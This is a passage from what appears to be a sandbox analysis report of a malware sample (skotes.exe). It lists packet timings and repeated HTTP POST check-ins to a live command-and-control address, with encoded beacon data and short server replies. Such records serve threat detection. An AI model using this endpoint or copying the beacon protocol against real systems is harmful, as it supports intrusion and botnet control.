                                      Oct 24, 2024 08:39:37.368880987 CEST8049995185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:37.368911982 CEST4999680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:37.369198084 CEST4999580192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:37.369391918 CEST4999680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:37.374773026 CEST8049996185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:38.278177977 CEST8049996185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:38.278294086 CEST4999680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:39.907432079 CEST4999680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:39.907820940 CEST4999780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:39.912966013 CEST8049996185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:39.913057089 CEST4999680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:39.913080931 CEST8049997185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:39.913160086 CEST4999780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:39.913351059 CEST4999780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:39.919522047 CEST8049997185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:40.811969042 CEST8049997185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:40.812108994 CEST4999780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:42.315661907 CEST4999780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:42.316190958 CEST4999880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:42.321275949 CEST8049997185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:42.321352959 CEST4999780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:42.321528912 CEST8049998185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:42.321611881 CEST4999880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:42.321806908 CEST4999880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:42.327121973 CEST8049998185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:43.239566088 CEST8049998185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:43.239705086 CEST4999880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:44.860466957 CEST4999880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:44.860852957 CEST4999980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:44.866270065 CEST8049999185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:44.866286039 CEST8049998185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:44.866468906 CEST4999880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:44.866504908 CEST4999980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:44.866781950 CEST4999980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:44.872157097 CEST8049999185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:45.780369043 CEST8049999185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:45.780497074 CEST4999980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:47.282603025 CEST4999980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:47.282987118 CEST5000180192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:47.288388014 CEST8049999185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:47.288405895 CEST8050001185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:47.288547039 CEST4999980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:47.288669109 CEST5000180192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:47.289036036 CEST5000180192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:47.294363976 CEST8050001185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:48.215714931 CEST8050001185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:48.215965986 CEST5000180192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:49.844863892 CEST5000180192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:49.845235109 CEST5000280192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:49.850649118 CEST8050001185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:49.850716114 CEST8050002185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:49.850744009 CEST5000180192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:49.850780010 CEST5000280192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:49.850935936 CEST5000280192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:49.856281996 CEST8050002185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:50.839905977 CEST8050002185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:50.840029001 CEST5000280192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:52.347618103 CEST5000280192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:52.347958088 CEST5000380192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:52.353213072 CEST8050002185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:52.353298903 CEST8050003185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:52.353301048 CEST5000280192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:52.353373051 CEST5000380192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:52.353543997 CEST5000380192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:52.358820915 CEST8050003185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:53.270018101 CEST8050003185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:53.270159960 CEST5000380192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:54.891840935 CEST5000380192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:54.892189980 CEST5000480192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:54.897620916 CEST8050003185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:54.897633076 CEST8050004185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:54.897767067 CEST5000380192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:54.897764921 CEST5000480192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:54.897938967 CEST5000480192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:54.903233051 CEST8050004185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:55.798255920 CEST8050004185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:55.798367977 CEST5000480192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:57.329526901 CEST5000480192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:57.329833984 CEST5000580192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:57.335448980 CEST8050005185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:57.335464001 CEST8050004185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:57.335668087 CEST5000480192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:57.335879087 CEST5000580192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:57.335879087 CEST5000580192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:57.341207027 CEST8050005185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:58.253169060 CEST8050005185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:58.253298044 CEST5000580192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:59.881609917 CEST5000580192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:59.882189035 CEST5000680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:59.887506008 CEST8050005185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:59.887568951 CEST5000580192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:59.888097048 CEST8050006185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:39:59.888171911 CEST5000680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:59.888361931 CEST5000680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:39:59.894633055 CEST8050006185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:00.794399023 CEST8050006185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:00.794590950 CEST5000680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:02.298235893 CEST5000680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:02.298670053 CEST5000780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:02.305250883 CEST8050007185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:02.305455923 CEST8050006185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:02.305474043 CEST5000780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:02.305520058 CEST5000680192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:02.305821896 CEST5000780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:02.311064005 CEST8050007185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:03.204879045 CEST8050007185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:03.205009937 CEST5000780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:04.832032919 CEST5000780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:04.832361937 CEST5000880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:04.837826967 CEST8050007185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:04.837857008 CEST8050008185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:04.837904930 CEST5000780192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:04.837945938 CEST5000880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:04.838192940 CEST5000880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:04.844048023 CEST8050008185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:05.755461931 CEST8050008185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:05.755609989 CEST5000880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:07.301141024 CEST5000880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:07.301392078 CEST5000980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:07.306807995 CEST8050008185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:07.306833982 CEST8050009185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:07.306888103 CEST5000880192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:07.306934118 CEST5000980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:07.307215929 CEST5000980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:07.312515974 CEST8050009185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:08.226078987 CEST8050009185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:08.229132891 CEST5000980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:10.057121992 CEST5000980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:10.058686018 CEST5001080192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:10.062743902 CEST8050009185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:10.062861919 CEST5000980192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:10.064034939 CEST8050010185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:10.064119101 CEST5001080192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:10.064454079 CEST5001080192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:10.069823027 CEST8050010185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:10.964411020 CEST8050010185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:10.964478970 CEST5001080192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:12.471916914 CEST5001080192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:12.472326040 CEST5001180192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:12.477431059 CEST8050010185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:12.477502108 CEST5001080192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:12.477597952 CEST8050011185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:12.477857113 CEST5001180192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:12.478023052 CEST5001180192.168.2.6185.215.113.43
                                      Oct 24, 2024 08:40:12.483244896 CEST8050011185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:13.396465063 CEST8050011185.215.113.43192.168.2.6
                                      Oct 24, 2024 08:40:13.399405956 CEST5001180192.168.2.6185.215.113.43
                                      • 185.215.113.43
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.649982185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:04.979887962 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:05.908071995 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:05 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.649983185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:07.465884924 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:08.379791975 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:08 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.649984185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:10.006949902 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:10.918543100 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:10 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.649985185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:12.439724922 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:13.345778942 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:13 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.649986185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:14.976119995 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:15.896683931 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:15 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.649988185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:17.416484118 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:18.331567049 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:18 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.649989185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:19.960088015 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:20.871769905 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:20 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.649990185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:22.398008108 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:23.319698095 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:23 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.649991185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:24.944549084 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:25.855693102 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:25 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.649992185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:27.368746996 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:28.274848938 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:28 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.649993185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:29.905942917 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:30.812454939 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:30 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.649994185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:32.335817099 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:33.251482010 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:33 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.649995185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:34.882500887 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
